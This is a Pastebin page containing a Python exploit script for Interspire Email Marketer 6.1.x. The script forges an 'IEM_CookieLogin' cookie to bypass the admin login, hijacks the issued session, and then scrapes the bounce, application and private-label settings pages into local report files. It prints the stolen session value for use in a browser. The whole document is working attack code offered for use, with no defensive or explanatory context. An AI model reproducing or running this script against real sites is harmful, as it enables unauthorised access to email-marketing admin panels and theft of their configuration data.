Guest User

s

a guest
Apr 9th, 2020
406
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Grab Cookies IEM 6.1.x
  2. # Example Usage: python file.py http://site.com/mail/admin/index.php
  3.  
  4. import requests
  5. import sys
  6. from bs4 import BeautifulSoup
  7. from pprint import pprint
  8.  
  9.  
  10. def cookie_cutter(url):
  11.     with requests.Session() as s:
  12.        s.get(url)
  13.        r = s.get(url)
  14.        response_regex = r.text
  15.        print("requesting initial Cookie\n")
  16.        print(str(r.headers)+"\n")
  17.        
  18.        for key,value in s.cookies.items():
  19.            if key and "IEMSESSIONID" in key:
  20.          
  21.               s.cookies.set('IEM_CookieLogin', "YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D")
  22.        print("Attempting To Posion 2nd request with Forged Cookie\n")
  23.        print("-" * 25)
  24.        r = s.get(url)
  25.        response_regex2 = r.text
  26.        print response_regex2
  27.        print(str(r.headers) + "\n")
  28.        if response_regex != response_regex2:
  29.  
  30.           for key,value in s.cookies.items():
  31.               if "IEMSESSIONID" in key:
  32.                  try:
  33.                     #
  34.                     bounce_info_grab(url,value)
  35.                     app_info_grab(url,value)
  36.                     privt_info_grab(url,value)
  37.                  except:
  38.                      pass
  39.                  return value,r.text
  40.  
  41.  
  42. def bounce_info_grab(url,session_to_ride):
  43.     url_grab = url+"?Page=Settings&Tab=2"
  44.     print(url_grab)
  45.     with requests.Session() as s:
  46.        s.get(url_grab)
  47.        s.cookies.set('IEMSESSIONID',session_to_ride)
  48.        r = s.get(url_grab)
  49.        response_regex = r.text
  50.        soup = BeautifulSoup(response_regex,'html5lib')
  51.        div = soup.find('div', id='div7')
  52.      
  53.        
  54.        outfile = open("bounce_report.html",'w')
  55.        dataout = """<html><head>Report</head><title>Report</title>
  56.                    <body>""" + str(div) +"""</body></html>"""
  57.        outfile.write(dataout)
  58.        outfile.close()
  59.        for divy in div.contents:
  60.            print(divy)
  61.          
  62. def app_info_grab(url,session_to_ride):
  63.     url_grab = url+"?Page=Settings&Tab=2"
  64.     print(url_grab)
  65.     with requests.Session() as s:
  66.        s.get(url_grab)
  67.        s.cookies.set('IEMSESSIONID',session_to_ride)
  68.        r = s.get(url_grab)
  69.        response_regex = r.text
  70.        soup = BeautifulSoup(response_regex,'html5lib')
  71.        div = soup.find('div', id='div1')
  72.    
  73.        
  74.        outfile = open("application_settings_report.html",'w')
  75.        dataout = """<html><head>Report</head><title>Report</title>
  76.                    <body>""" + str(div) +"""</body></html>"""
  77.        outfile.write(dataout)
  78.        outfile.close()
  79.        for divy in div.contents:
  80.            print(divy)  
  81.    
  82. def privt_info_grab(url,session_to_ride):
  83.     url_grab = url+"?Page=Settings&Tab=2"
  84.     print(url_grab)
  85.     with requests.Session() as s:
  86.        s.get(url_grab)
  87.        s.cookies.set('IEMSESSIONID',session_to_ride)
  88.        r = s.get(url_grab)
  89.        response_regex = r.text
  90.        soup = BeautifulSoup(response_regex,'html5lib')
  91.        div = soup.find('div', id='div8')
  92.      
  93.        
  94.        outfile = open("privtlbl_settings_report.html",'w')
  95.        dataout = """<html><head>Report</head><title>Report</title>
  96.                    <body>""" + str(div) +"""</body></html>"""
  97.        outfile.write(dataout)
  98.        outfile.close()
  99.        for divy in div.contents:
  100.            print(divy)  
  101.    
  102. def main():
  103.     url = sys.argv[1]
  104.     print  "Target: " +url+ """ """+"\n"
  105.     print "-" * 25
  106.     try:
  107.        session_rider_value,content = cookie_cutter(url)
  108.        print "\033[92m Session Has Been Generated"+"\n"
  109.        print "-" * 25
  110.        print "\033[92m Magic Cookie Generated! Modify Existing IEMSESSIONID Value In browser With Below Value"
  111.        print "-" * 25
  112.        print  session_rider_value+"\n"
  113.        print "-" * 25
  114.     except:
  115.        print "\033[91m Target Is Not Vulnerable"
  116.        pass
  117.    
  118. main()
RAW Paste Data